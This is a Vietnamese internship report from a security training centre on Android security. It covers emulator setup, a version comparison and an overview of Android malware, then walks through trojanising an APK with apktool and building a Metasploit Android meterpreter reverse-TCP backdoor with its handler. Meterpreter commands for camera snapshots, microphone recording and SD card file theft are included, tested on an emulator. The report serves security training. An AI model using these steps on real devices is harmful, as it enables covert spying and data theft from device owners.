  • 7. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 6 GIỚI THIỆU - Số lượng các báo cáo về nguy cơ an ninh trên các thiết bị di động Android từ các công ty nghiên cứu bảo mật gia tăng cho thấy hệ điều hành này đang là đích nhắm cho tin tặc cùng các phần mềm độc hại. - Không quá khó khăn và cũng không cần thiết phải có những nghiên cứu chi tiết để nhận ra rằng hệ điều hành Android đang bị tấn công nhiều hơn. Chỉ cần nhìn vào trường hợp facebook, khi mạng xã hội này trở nên nổi tiếng và có số lượng người dùng đông đảo, lập tức nó trở thành đích ngắm của các tin tặc.Giới tội phạm mạng luôn tìm mọi cách để lợi dụng các lỗ hổng bảo mật của những hệ điều hành được cài đặt trên số đông thiết bị. Và điểm yếu cố hữu trong an ninh bảo mật vẫn nằm ở người dùng rồi mới đến thiết bị. Các nhà nghiên cứu bảo mật cho biết hiện có quá nhiều người dùng Android bất cẩn luôn tải về ứng dụng mà không thèm kiểm tra tìm hiểu trước xem chúng có an toàn hay không. - Vậy để biết thêm phần nào về cách thức mà các tin tặc tấn công các thiết bị Android đồng thời để hạn chế được điều này, em xin mời thầy và các bạn cùng đi đến bài báo cáo của em.
  • 8. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 7 MỤC LỤC PHẦN I: GIỚI THIỆU VỀ NƠI THỰC TẬP .................................................................................. 8 I. Giới thiệu về Trung tâm Athena .................................................................................................. 8 II. Trụ sở và các chi nhánh ............................................................................................................ 8 III. Cơ cấu tổ chức:........................................................................................................................ 9 PHẦN II: BÁO CÁO ĐỀ TÀI ...................................................................................................... 10 I. Nghiên cứu hệ điều hành Android trên môi trường giả lập. .......................................................... 10 1. Cài đặt hệ điều hành Android 2.3 và 4.x trên môi trường giả lập. ........................................ 10 1.1 Cài đặt Java trên máy tính. .............................................................................................. 10 1.2 Download và Cài đặt Eclipse, Android SDK.................................................................... 12 1.3 Tạo máy AVD (Android Virtual Device).......................................................................... 14 2. So sánh sự khác nhau giữa hai phiên bản Android 2.3 và 4.x............................................... 17 2.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt.................................................... 17 2.2. Sự khác nhau về giao diện. ............................................................................................. 18 2.3. Sự khác nhau về tính năng. ............................................................................................ 19 2.4. Sự khác nhau về giao thức mạng. ................................................................................... 20 3. Nghiên cứu cài đặt trojan , backdoor trên thiết bị Android (iMatch) .................................... 20 4. Nghiên cứu các chương trình có mã đọc trên Android (iCalendar) ..................................... 20 4.1. Thực trạng.................................................................................................................... 20 4.2. Nghiên cứu lỗ hổng bảo mật trên Android. ..................................................................... 21 4.3. Cài đặt trojan trên Android (iCalendar) .......................................................................... 22 5. Nghiên cứu Kali Linux – các cơ chế tạo mã độc trên Kali –Linux , từ đó xâm nhập thẻ Sd card, kích hoạt camera, ghi âm trên thiết bị, sau đó truyền dữ liệu về máy điều khiển từ xa ...... 23 5.1 Tìm hiểu Kali Linux ....................................................................................................... 23 5.2 Cài đặt Kali Linux trên máy ảo VMWare ......................................................................... 24 5.3 Tạo mã độc trên Kali Linux để xâm nhập Android ........................................................... 32 II. Thực hiện trên môi trường internet .......................................................................................... 43 1. Cài mã độc trên VPS........................................................................................................... 43 1.1 Giới thiệu Metasploit lên VPS ....................................................................................... 43 1.2 Cài đặt .......................................................................................................................... 43 2. Từ VPS điều khiển thiết bị qua internet ............................................................................... 47 III. Tổng kết:............................................................................................................................... 52
  • 9. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 8 PHẦN I: GIỚI THIỆU VỀ NƠI THỰC TẬP I. Giới thiệu về Trung tâm Athena - Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA_Tiền thân là Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, (tên thương hiệu viết tắt là TRUNG TÂM ĐÀO TẠO ATHENA), được chính thức thành lập theo giấy phép kinh doanh số 4104006757 của Sở Kế Hoạch Đầu Tư Tp Hồ Chí Minh cấp ngày 04 tháng 11 năm 2008. -Tên công ty viết bằng tiếng nước ngoài: ATHENA ADVICE TRAINING NETWORK SECURITY COMPANY LIMITED ATHENA là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lĩnh vực công nghệ thông tin.Với quyết tâm góp phần vào công cuộc thúc đẩy tiến trình tin học hóa của nước nhà. ATHENA đã và đang tập trung chủ yếu vào các họat động sau: - Công tác huấn luyện, quảng bá kiến thức tin học, đặc biệt trong lĩnh vực mạng máy tính, internet, bảo mật và thương mại điện tử…. - Tư vấn và hổ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động sản xuất kinh doanh. - Cung cấp nguồn nhân lực trong lĩnh vực công nghệ thông tin, đặc biệt là chuyên gia về mạng máy tính và bảo mật mạng đạt trình độ quốc tế cho các tổ chức, doanh nghiệp có nhu cầu. - Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển cơ sở dữ liệu thông tin về các ứng dụng và sự cố mạng. - Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trường hợp xảy ra sự cố máy tính. II. Trụ sở và các chi nhánh - Trụ sở chính: + Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam. + Website: www.athena.com.vn
  • 10. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 9 + Điện thoại: ( 84-8 ) 3824 4041 + Hotline: 0943 23 00 99 - Cơ sở 2_Tại TP Hồ Chí Minh: + Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA Số 2 Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam. + Website: www.Athena.Edu.Vn + Điện thoại: ( 84-8 ) 2210 3801 + Hotline: 0943 20 00 88 - Chi nhánh Nha Trang: + Điện thoại : 08. 3824 4041 - Fax: 08. 39 111 692 + Website: www.athena.edu.vn + Email :training@athenavn.com III. Cơ cấu tổ chức: - Sơ đồ tổ chức công ty:
  • 11. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 10 PHẦN II: BÁO CÁO ĐỀ TÀI I. Nghiên cứu hệ điều hành Android trên môi trường giả lập. 1. Cài đặt hệ điều hành Android 2.3 và 4.x trên môi trường giả lập. 1.1 Cài đặt Java trên máy tính. - Để có thể lập trình được App cho Android thì trên máy tính của bạn phải đặt toàn bộ JDK. Bạn có thể download bộ JDK tại địa chỉ : tại đây. (Tùy vào phiên bản windows của bạn là 32bit hay là 64bit bạn cần download cho phù hợp) - Sau khi tải bộ JDK về máy.các bạn tiến hành cài đặt chúng. - Xuất hiện cửa dổ cài đặt, các bạn cứ ấn Next… - Và đợi cho tới khi quá trình cài đặt hoàn tất.
  • 12. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh - Sau khi cài xong, các bạn có thể kiểm tra lại xem bộ JDK đã cài được trên máy tính của bạn chưa bẳng cách vào CMD và gõ lệnh: “java” - Nếu màn hình hiện ra như sau là bạn đã hoàn thành rồi: Trang 11
  • 13. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 12 1.2 Download và Cài đặt Eclipse, Android SDK. - Trước tiên ta phải download bộ Eclipse. + Các bạn vào địa chỉ : http://developer.android.com/sdk/index.html + Download bộ cài đầy đủ bao gồm Eclipse và Android SDK : ADT Bundle for Windows
  • 14. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 13 - Sau khi download về, các bạn giải nén ra và sẽ có các file như sau : - Để cài đặt Android SDK các bạn có 2 cách: + Cách 1: Các bạn click chuột vào biểu tượng SDK Manager ở ngoài và tiến hành cài đặt. + Cách 2: Các bạn khởi chạy Eclipse lên. Rồi vào mục Android SDK Manager cũng được:
  • 15. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 14 - Sẽ xuất hiện 1 cửa sổ mới như sau : - Công việc tiếp theo là các bạn chỉ cần tích chọn các phần API cần cài rồi click vào nút :Install packages ở góc dưới bên phải và chờ cho nó download và cài đặt là xong. 1.3Tạo máy AVD (Android Virtual Device). - Đầu tiên bạn khởi chạy Eclipse lên. - Các bạn có thể xem hướng dẫn cách cài đặt Eclipse và Android SDK ở phần hướng dẫn trước. - Sau khi khởi chạy xong Eclipse. +Bạn vào : Windows ->Android Virtual Device Manager. +Hoặc các bạn cũng có thể click ngay vào biểu tượng AVD trên menu của Eclipse :
  • 16. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 15 - Click vào New để tạo mới : - Cửa sổ mới mở ra, các bạn điền đầy đủ các thông số vào theo yêu cầu :
  • 17. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh AVD Name : Các bạn chỉ được sử dụng cách ký tự : A -> Z, a -> z, và “., -, _” Trang 16 mà thôi. Target : Bạn chọn phiên bản Android để test. SD Card : Là dung lượng bộ nhớ ảo của thẻ SD. Và một số thông tin khác… Các bạn click OK để hoàn thành tạo mới một AVD. Bây giờ bạn vào phần Android Virtual Device Manager như ban đầu thì bạn sẽ thấy tên máy ảo mới mình vừa tạo rồi. Nhấn Start để khởi chạy máy ảo (bạn có thể sẽ phải chờ một khoảng thời gian để máy ảo khởi chạy) :
  • 18. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 17 2. So sánh sự khác nhau giữa hai phiên bản Android 2.3 và 4.x. 2.1. Sự khác nhau về yêu cầu phần cứng cần thi ết để cài đặt. Android 2.3 Android 4x Cần ít nhất 128 MB bộ nhớ có sẵn cho Kernel và cho không gian người sử dụng Cần ít nhất 340 MB bộ nhớ có sẵn cho kernel và cho không gian người sử dụng Dung lượng Ram tối thiểu cần thiết là 150MB Dung lượng Ram tối thiểu cần thiết là 350 MB Màn hình: - Màn hình phải có kích cỡ ít nhất 2,5 inch - Mật độ phải được ít nhất 100 dpi - Tỉ lệ màn hình từ 1.333 (4:3) đến 1,779 Màn hình: - Màn hình phải có kích cỡ ít nhất 426x320 - Mật độ phải được ít nhất 100 dpi
  • 19. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 18 (16:9) - Công nghệ màn hình được sử dụng là công nghệ “ Square pixels” - Tỉ lệ màn hình từ 1.333 (4:3) đến 1,85 (16:9) Yêu cầu có các phím vậy lý Không yêu cầu có có phím vật lý Các API Android bao gồm trình quản lý download các ứng dụng có thể sử dụng để tải dữ liệu.Trình quản lí download phải có khả năng tải tập tin có dung lượng ít nhất 55 MB Các API Android bao gồm trình quản lý download các ứng dụng có thể sử dụng để tải dữ liệu.Trình quản lí download phải có khả năng tải tập tin có dung lượng ít nhất 100 MB 2.2. Sự khác nhau về giao di ện. - Giao diện người dùng của Android dựa trên nguyên tắc tác động trực tiếp, sử dụng cảm ứng chạm tương tự như những động tác ngoài đời thực như vuốt, chạm, kéo dãn và thu lại để xử lý các đối tượng trên màn hình.Sự phản ứng với tác động của người dùng diễn ra gần như ngay lập tức, nhằm tạo ra giao diện cảm ứng mượt mà, thường dùng tính năng rung của thiết bị để tạo phảnhồi rung cho người dùng. Những thiết bị phần cứng bên trong như gia tốckế, con quay hồi chuyển và cảm biến khoảng cách được một số ứng dụng sử dụng để phản hồi một số hành động khác của người dùng, ví dụ như điều chỉnh màn hình từ chế độ hiển thị dọc sang chế độ hiển thị ngang tùy theo vị trí của thiết bị, hoặc cho phép người dùng lái xe đua bằng xoay thiết bị, giống như Các thiết bị Android sau khi khởi động sẽ hiển thị màn hình chính, điểm khởi đầu với các thông tin chính trên thiết bị, tương tự như khái niệm desktop (bàn làm việc) trên máy tính để bàn. Màn hính chính Android thường gồm nhiều biểu tượng (icon) và tiện ích (widget); biểu tượng ứng dụng sẽ mở ứng dụng tương ứng, còn tiện ích hiển thị những nội dung sống động, cập nhật tự động như dự báo thời tiết, hộp thư của người dùng, hoặc những mẩu tin thời sự ngay trên màn hình chính. Màn hình chính có thể gồm nhiều trang xem được bằng cách vuốt ra trước hoặc sau, mặc dù giao diện màn hình chính của Android có thể tùy chỉnh ở mức cao, cho phép người dùng tự do sắp đặt hình dáng cũng như hành vi của thiết bị theo sở thích. Những ứng dụng do các hãng thứ ba có trên Google Play và các kho ứng dụng khác còn cho phép người dùng thay đổi "chủ đề" của màn hình chính, thậm chí bắt chước hình dáng của hệđiều
  • 20. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh hành khác như Windows Phone chẳng hạn. Phần lớn những nhà sản xuất, và một số nhà mạng, thực hiện thay đổi hình dáng và hành vi của các thiết bị Android của họ để phân biệt với các hãng cạnh tranh. Ở phía trên cùng màn hình là thanh trạng thái, hiển thị thông tin về thiết bị và tình trạng kết nối. Thanh trạng thái này có thể "kéo" xuống để xem màn hình thông báo gồm thông tin quan trọng hoặc cập nhật của các ứng dụng, như email hay tin nhắn SMS mới nhận, mà không làm gián đoạn hoặc khiến người dùng cảm thấy bất tiện.Trong các phiên bản đời đầu, người dùng có thể nhấn vào thông báo để mở ra ứng dụng tương ứng, về sau này các thông tin cập nhật được bổ sung theo tính năng, như có khả năng lập tức gọi ngược lại khi có cuộc gọi nhỡ mà không cần phải mở ứng dụng gọi điện ra. Thông báo sẽ luôn nằm đó cho đến khi người dùng đã đọc hoặc xóa nó đi. Trang 19 Android 2.3 Android 4x Giao diện đơn giản Giao diện tinh tế hơn, trong suốt và đẹp mắt hơn Chỉ hỗ trợ phím ảo là phím Home Hỗ trợ các phím ảo: Home, Back, Zoom Không có widget menu Có Widget menu giúp tìm nhanh thông tin mà không cần mở ứng dụng 2.3. Sự khác nhau về tính năng. Android 2.3 Android 4x Thiết kế tối ưu hóa cho Smartphone Thiết kế tối ưu hóa cho Smartphone và Tablet Chỉ có thể xóa tất các các thông báo cùng lúc trên trình quản lý Chỉ có thể xóa riêng rẽ các thông báo cùng lúc trên trình quản lý Chỉ có thể trả lời, ngắt cuộc gọi khi màn hình bị khóa Có thể thực hiện thêm 1 số tính năng khi màn hình bị khoái ngoài trả lời , ngắt cuộc gọi như gửi tin nhắn Không có tính năng mở khóa màn hình nhận diện khuôn mặt Có tính năng mở khóa màn hình nhận diện khuôn mặt Không hỗ trợ chỉnh sửa hình ảnh Hỗ trợ chỉnh sửa hình ảnh , tự động nhận diện được tất cả các camera trên thiết bị
  • 21. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 20 2.4. Sự khác nhau về giao thức mạng. Android 2.3 Android 4x Không hỗ trợ giao thức https Hỗ trợ giao thức https 3. Nghiên cứu cài đặt trojan , backdoor trên thiết bị Android (iMatch) Ứng dụng iMatch đã được minh họa cách cài đặt qua clip đính kèm 4. Nghiên cứu các chương trình có mã đọc trên Android (iCalendar) 4.1. Thực trạng - Một báo cáo mới vừa được công bố, cho thấy mức độ nghiêm trọng của mã độc trên Android - hệ điều hành di động phổ biến nhất thế giới có đến 99,9% số lượng mã độc mới được phát hiện trong quý I năm 2013 được thiết kế để nhắm đến nền tảng Android. Đây là một con số báo động về tình trạng mã độc trên nền tảng di động của Google vừa được hãng bảo mật Kaspersky Lab công bố. - Phần lớn trong số các loại mã độc trên Android là virus trojan, một dạng virus chủ yếu để sử dụng để đánh cắp tiền của người dùng bị lây nhiễm bằng cách gửi đến họ những tin nhắn lừa đảo, đọc lén các thông tin cần thiết và gửi báo cáo đến nơi khác, ăn cắp thông tin như là mật khẩu và số thẻ tín dụng, cài đặt lén các phần mềm chưa được cho phép, ….. Loại mã độc này chiếm đến 63% tổng số các loại mã độc mới được phát tán trên Android trong quý I năm 2013. - Các nhà nghiên cứu bảo mật của Kaspersky cũng báo cáo một sự bùng nồ về số lượng các mã độc hại trên di động. Theo đó chỉ tính riêng trong 3 tháng đầu năm 2013, Kaspersky đã phát hiện được số lượng mã độc mới trên các nền tảng di độngbằng tổng số lượng mã độc được phát hiện trong cả năm 2012 mà Android là nền tảng chịu ảnh hưởng nặng nhất. - Với việc Android tiếp tục trở thành “mồi ngon” của hacker trong việc phát tán các loại mã độc, có vẻ như Android đang dần trở thành một “Windows thứ 2” trên lĩnh vực bảo mật, khi sự phổ biến của nền tảng này đang thu hút tối đa sự chú ý của các tin tặc, đồng thời việc quản lý các ứng dụng cho Android một cách lỏng lẻo càng tạo điều kiện cho mã độc được phát tán dễ dàng hơn trên nền tảng di động này.
  • 22. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh - Bên cạnh lĩnh vực mã độc trên nền tảng di động, báo cáo về tình trạng bảo mật trong quý I/2013 của Kaspersky cũng cho biết 91% các vụ phát tán mã độc chủ yếu dựa vào việc phát tán các đường link trang web có chứa mã độc. Các đường link có chứa mã độc này chủ yếu được phát tán thông qua email và trên các mạng xã hội như Facebook, Twitter… Đây được xem là biện pháp được yêu thích nhất hiện nay của hacker. Trang 21 4.2. Nghiên cứu l ỗ hổng bảo mật trên Android.  Malware trên Android. - Malware (phần mềm ác tính) viết tắt của cụm từ Malicious Sofware, là một phần mềm máy tính được thiết kế với mục đích thâm nhập hoặc gây hỏng hóc máy tính mà người sử dụng không hề hay biết. - Theo thống kê của các hãng bảo mật trên thế giới thì hiện các Malware hiện nay mới chỉ dừng lại ở mức độ xâm nhập và ăn cắp thông tin của người dùng và nó chưa có cơ chế lây lan. Theo các kết quả trên thì Malware trên Smartphone hiện nay về cách thức hoạt động giống như một phần mềm gián điệp (Trojan) hơn là một virus phá hủy.  Cơ chế hoạt động của Malware. - Lấy một ví dụ cụ thể về 1 Malware rất phổ biến trong thời gian vừa qua đó là Malware DroidDream. Malware này hoạt động qua 2 giai đoạn: + Giai đoạn đầu: DroidDream được nhúng vào trong một ứng dụng (số lượng ứng dụng chứa Malware này hiện đã nhiều hơn 50 ứng dụng) và sẽ chiếm được quyền root vào thiết bị của bạn ngay sau khi bạn chạy ứng dụng đó trong lần sử dụng đầu tiên. + Giai đoạn 2: Tự động cài đặt một ứng dụng thứ 2 với một permission đặc biệt cho phép quyền uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có thể gửi các thông tin nhạy cảm tới một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác Một khi DroidDream chiếm được quyền root, Malware này sẽ chờ đợi và âm thầm cài đặt một ứng dụng thứ hai, DownloadProviderManager.apk như một ứng dụng hệ thống. Việc cài đặt ứng dụng hệ thống này nhằm ngăn ngừa người dùng xem hoặc gỡ bỏ cài đặt các ứng dụng mà không được phép.
  • 23. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh - Không giống như giai đoạn đầu, người dùng phải khởi động ứng dụng để bắt đầu việc lây nhiễm, ở giai đoạn thứ 2 ứng dụng tự động làm một số việc như là confirm, checkin….Một điều nữa khiến cho bạn không thể biết chúng hoạt động lúc nào, đó là Malware DroidDream này được lập trình để làm hầu hết các công việc của mình vào khoảng thời gian từ 11h đêm tới 8h sáng ngày hôm sau. Đây là khoảng thời gian mà điện thoại ít có khả năng được sử dụng nhất. Điều này làm cho người dùng khó khăn hơn trong việc phát hiện một hành vi bất thường trên chiếc smartphone của mình. Trang 22  Mục đích của Malware DroidDream - DroidDream được coi là một trong những Malware đầu tiên trên Android, mục đích của con DroidDream này mới chỉ dừng lại ở mức độ làm cho chiếc điện thoại của người dùng tự động cài đặt những ứng dụng chứa mã độc khác. Tuy nhiên các biến thể của nó đã kịp thời biến đổi để gây ra các mối nguy hại lớn hơn rất nhiều. Ví dụ như Hippo SMS được tìm thấy mới đây có khả năng tự gửi tin nhắn mà không cần sự cho phép của người dùng, việc này sẽ khiến tiền cước phí của người dùng tăng lên một cách chóng mặt mà người dùng không biết rõ lí do tại sao. Hoặc một Malware khác là Zitmo, Malware này đưa ra các ứng dụng kích hoạt mọi hành động liên quan đến dịch vụ ngân hàng, tiếp nhận SMS gửi đến và chuyển tới máy chủ. Các đoạn code dùng 1 lần mà các ngân hàng thường gửi tới khách hàng thông qua tin nhắn SMS để chứng thực sẽ bị thu thập bởi các malware này. - Hiện nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc điện thoại. Vấn đề này thực sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng ta đang bị một theo dõi, vì vậy những mối nguy hiểm từ mã độc trên android đang thực sự đe dọa đến an sự an toàn của người dùng hệ điều hành này. 4.3. Cài đặt trojan trên Android (iCalendar) 1.Dùng công cụ apktool để chỉnh sửa file apk apktool if name.apk apktool d name.apk apktool b name 2.Signing ứng dụng, tạo chữ ký điện tử để thiết bị có thể sử dụng được ứng dụng keytool -genkey -v -keystore name-name.keystore -alias name -keyalg RSA - keysize 2048 -validity 10000
  • 24. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore name-name. keystore name.apk name jarsigner -verify -verbose -certs name.apk Trang 23 3.Cài đặt ứng dụng lên máy nạn nhân adb -s emulator-device install name.apk Demo cài đặt ứng dụng Icalendar và đã được minh họa trên clip đính kèm 5. Nghiên cứu Kali Linux – các cơ chế tạo mã độc trên Kali –Linux , từ đó xâm nhập thẻ Sd card, kích hoạt camera, ghi âm trên thiết bị, sau đó truyền dữ liệu về máy điều khiển từ xa 5.1 Tìm hi ểu Kali Linux - Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để kiểm tra bảo mật, thử nghiệm xâm nhập các hệ thống máy tính.Tiền thân của Kali Linux là BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng sử dụng. Sau 7 năm liên tục phát triển, tháng 3 năm 2013, hãng Offensive Security đã công bố phiên bản mới của BackTrack có tên là Kali Linux (được xem như phiên bản BackTrack 6). Kali Linux tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà bất kì chuyên gia đánh giá bảo mật nào cũng cần sử dụng khi tác nghiệp.  Nói về ưu đi ểm của Kali là nói về những thay đổi giữa BackTrack và Kali.So với BackTrack, Kali có rất nhiều cải tiến:  Kali phát triển trên nền tảng hệ điều hành Debian - Điều này có nghĩa Kali có rất nhiều ưu điểm.Đầu tiên là các Repository (Kho lưu trữ phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có được các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository.Duy trì cập nhật (up-to-date) đối với các công cụ Penetration Test là một yêu cầu vô cùng quan trọng. - Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu trúc hệ thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét hoặc thay đổi mã nguồn của các công cụ.  Tính tương thích kiến trúc
  • 25. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh - Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến trúc ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Giờ đây ta có thể build Kali trên một Raspberry Pi hoặc trên Samsung Galaxy Note. Trang 24  Hỗ trợ mạng không dây tốt hơn - Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là sự hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay USB Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá mạng không dây.  Khả năng tùy biến cao - Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với giao diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops như GNOME, KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng.  Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai - Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều hành Kali.Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta đều phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3 năm ngoái). - Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã dễ dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không phải cài lại mới hoàn toàn nữa 5.2 Cài đặt Kali Linux trên máy ảo VMWare - Trước tiên cần tải về file ISO phiên bản mới nhất của Kali Linux trên link dưới, bài này ta sẽ tiến hành cài phiên bản Kali Linux 1.0.6 64 bit. http://www.kali.org/downloads/
  • 26. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh - Tất nhiên ta cần phải có Vmware, việc tải và cài đặt Vmware rất dễ dàng, ta có thể tìm trên mạng. Sau khi có file ISO ta bắt đầu tiến hành cài đặt lên máy ảo. - Mở VMware, chọn File ở góc phải trên màn hình, chọn New Virtual Machine... . Trên cửa sổ mới mở, chọn custom và nhấn next - Tiếp tục nhấn next đến khi yêu cầu chọn file ISO thì ta chọn ISO của kali đã tải trước đó: Trang 25
  • 27. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 26 - Đặt tên và đặt đường dẫn cho máy ảo - Tiếp tục chọn cấu hình cho máy ảo, ta có thể để mặc định. - Máy ảo sẽ khởi động và vào giao diện cài đặt, chọn Graphic Install
  • 28. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh - Bấm chọn ngôn ngữ, địa điểm, Host name như khi cài đặt hệ điều hành bình thường... - Tiếp theo chọn Root password, luôn nhớ Root password đã chọn! Trang 27 - Phần Partition chọn Guided – use entire disk và All files in one partition
  • 29. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 28 - Chọn Finish partitioning and write changes to disk
  • 30. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 29 - Chọn Yes
  • 31. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 30 - Nhấn continue để bắt đầu cài đặt khoảng 15 phút. - Sau khi cài đặt xong, chọn No ở Network mirror, chọn Yes ở phần Boot-loader.
  • 32. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh - Sau khi hoàn tất phần cuối và khởi động lại, đến giao diện login ta nhập user là root và password đã đặt ở phần trước. - Vậy là ta đã hoàn tất cài đặt kali linux trên Vmware Trang 31
  • 33. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 32 5.3 Tạo mã độc trên Kali Linux để xâm nhập Android - Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo Kali Linux bằng Vmware, ta nên thiết lập phần Network như sau: - Bấm vào VM -> Settings... ở thanh lựa chọn của Vmware - Bấm vào Network Adapter và chọn Bridged: connection directly to the physical network - Bấm vào Edit -> Virtual Network Editor...
  • 34. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh - Trên phần Bridge (connect VMs directly to the external network) chọn adapter của máy thật Trang 33 - Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android Đầu tiên mở terminal và gõ dòng lệnh
  • 35. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Msfpayload android/meterpreter/reverse_tcp lhost=192.168.0.104 Trang 34 lport=8080 R > /root/Desktop/files.apk 192.168.0.104là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig để xem IP của máy Kali 8080 là số port, có thể chọn port khác, không nên chọn các port thường sử dụng - Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một Metasploit reverse tcp backdoor.
  • 36. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 35 - Tiếp theo, gõ lệnh msfconsole - Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ lệnh sau: use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.0.104 – nhập địa chỉ IP giống với khi tạo payload ở trên. set lport 8080– nhập port giống với port khi tạo payload ở trên. Exploit - Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.
  • 37. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh - Thử với một máy Galaxy nexus giả lập, tải về files.apk, cài đặt và mở lên được giao diện như dưới, nhấp vào nút reverse_tcp: Trang 36
  • 38. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh - Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau: Trang 37
  • 39. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 38 - Để xem thông tin về máy, nhập lệnh SysInfo  Sử dụng camera: Để xem danh sách camera, nhập webcam_list - Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera ở phần trước. Ví dụ như sau:
  • 40. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh - File hình đã chụp từ camera của máy android là FrumITki.jpeg được lưu ở /root của máy Trang 39  Ghi âm - Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
  • 41. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 40  Lấy file từ sd card - Để vào sdcard, nhập lệnh :cd /sdcard và lệnh ls để xem danh sách file, thư mục - Ví dụ ở đây, ta tải file App.apk trong thư mục download của sdcard
  • 42. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 41 - Dùng lệnh cd /sdcard/Download để vào thư mục
  • 43. Báo Cáo Thực Tập SVTH: Lê Trần Xuân Lãnh Trang 42 - Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh Download App.apk - Và file này sẽ được tải về thư mục root của máy Kali
